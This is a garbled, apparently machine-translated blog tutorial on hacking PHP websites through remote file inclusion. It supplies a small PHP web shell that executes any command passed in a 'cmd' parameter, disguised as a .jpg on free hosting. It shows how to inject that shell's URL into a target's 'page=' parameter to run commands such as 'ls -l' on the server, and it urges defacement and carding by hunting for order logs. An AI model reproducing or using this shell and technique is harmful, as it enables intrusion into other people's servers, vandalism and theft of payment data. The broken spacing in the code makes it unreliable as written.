Hack a server using PHP Bugs Injection.

Preparation:
1. - Hosting File (jg free Yg lot. Example: Geocities, Ripway, etc.)
2. - Kangen band's song for you damn action nemenin
Okay, copy and paste the following script
Code:

// CMD - To Execute Command on File Injection Bug (gif - jpg-txt)

if (isset ($ chdir)) @ chdir ($ chdir);

ob_start ();

system ( "$ cmd 1> / tmp / cmdtemp 2> &1; cat / tmp / cmdtemp; rm / tmp / cmdtemp");

$ output = ob_get_contents ();

ob_end_clean ();

if (! empty ($ output)) echo str_replace (">", ">", str_replace ("<", "<",

$ output));

?>








bean-rebuz-hackers.200u.com

Exclusif for Hackers community | www.Hacker.200u.com

Join us at Hackers.200u.com

If so, save with the name and format.jpg CMD. Then upload to hosting you. (Jg free Yg many, udh discussed above) When I upload, then I'll get a URL like the following:
http://www.geocities/kacangrebuz/cmd.jpg
After that search for targets (This requires a high level of patience)
After the meet, for example:
http://www.target.com/main.php?page=article
Well, you change its URL jd
. http://www.target.com/main.php?page=http://www.geocities/kacangrebuz/cmd.jpg&cmd =
Then they will be executed URL! example:
. http://www.target.com/main.php?page=http://www.geocities/kacangrebuz/cmd.jpg&cmd=ls-l
and his tough results ... browser will menampilakan all imaginable directory in UNIX server according to the command above (ls-l is the command to view the contents of its directory
permissions).
For Defacing or carding, you can mengexplore lbh far lg ...
Okay ... okay ... I love him keyword:
to deface = "index.html, index.php, index.htm"
for carding = "orderlog.txt, order.php"
All exist on the server, live how you find it: D
so ... Happy Hacking!

What's on Your Mind...

My Blog List

Followers

guest book


ShoutMix chat widget